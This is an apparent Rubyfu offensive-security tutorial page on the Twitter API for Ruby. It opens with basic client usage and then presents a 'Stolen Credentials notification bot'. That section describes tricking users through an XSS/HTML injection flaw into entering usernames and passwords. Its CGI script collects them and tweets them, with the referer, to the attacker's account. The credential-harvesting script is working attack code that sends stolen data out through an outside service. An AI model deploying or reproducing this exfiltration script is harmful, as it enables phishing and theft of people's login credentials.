Twitter API

Dealing with Twitter’s API is really useful for information gathering, taxonomy and social engineering. However, you have to have some keys and tokens in-order to interact with Twitter’s APIs. To do so, please refer to the official Twitter development page.

  • Install Twitter API gem
    1. gem install twitter

Basic Usage

rubyfu-tweet.rb

  1. #!/usr/bin/env ruby
  2. # KING SABRI | @KINGSABRI
  3. #
  4. require 'twitter'
  5. require 'pp'
  7. client = Twitter::REST::Client.new do |config|
  8.         config.consumer_key        = "YOUR_CONSUMER_KEY"
  9.         config.consumer_secret     = "YOUR_CONSUMER_SECRET"
  10.         config.access_token        = "YOUR_ACCESS_TOKEN"
  11.         config.access_token_secret = "YOUR_ACCESS_SECRET"
  12. end
  14. puts client.user("Rubyfu")                   # Fetch a user
  15. puts client.update("@Rubyfu w00t! #Rubyfu")  # Tweet (as the authenticated user)
  16. puts client.follow("Rubyfu")                 # Follow User (as the authenticated user)
  17. puts client.followers("Rubyfu")              # Fetch followers of a user
  18. puts client.followers                        # Fetch followers of current user
  19. puts client.status(649235138585366528)       # Fetch a particular Tweet by ID
  20. puts client.create_direct_message("Rubyfu", "Hi, I'm KINGSABRI")    # Send direct message to a particular user

Twitter API - 图1

Your turn, tweet to @Rubyfu using above example. Tweet your code and output to @Rubyfu.

Building Stolen Credentials notification bot

We’re exploiting an XSS/HTML injection vulnerability and tricking users to enter there Username and Password. The idea is, We’ll make a CGI script that takes that stolen credentials then tweet these credentials to us as notification or log system

  1. #!/usr/bin/ruby -w
  3. require 'cgi'
  4. require 'uri'
  5. require 'twitter'
  7. cgi  = CGI.new
  8. puts cgi.header
  10. user = CGI.escape cgi['user']
  11. pass = CGI.escape cgi['pass']
  12. time = Time.now.strftime("%D %T")
  14. client = Twitter::REST::Client.new do |config|
  15.         config.consumer_key        = "YOUR_CONSUMER_KEY"
  16.         config.consumer_secret     = "YOUR_CONSUMER_SECRET"
  17.         config.access_token        = "YOUR_ACCESS_TOKEN"
  18.         config.access_token_secret = "YOUR_ACCESS_SECRET"
  19. end
  20. client.user("KINGSABRI")
  22. if cgi.referer.nil? or cgi.referer.empty?
  23.     # Twitter notification | WARNING! It's tweets, make sure your account is protected!!!
  24.     client.update("[Info] No Referer!\n" + "#{CGI.unescape user}:#{CGI.unescape pass}")
  25. else
  26.     client.update("[Info] #{cgi.referer}\n #{CGI.unescape user}:#{CGI.unescape pass}")
  27. end
  29. puts ""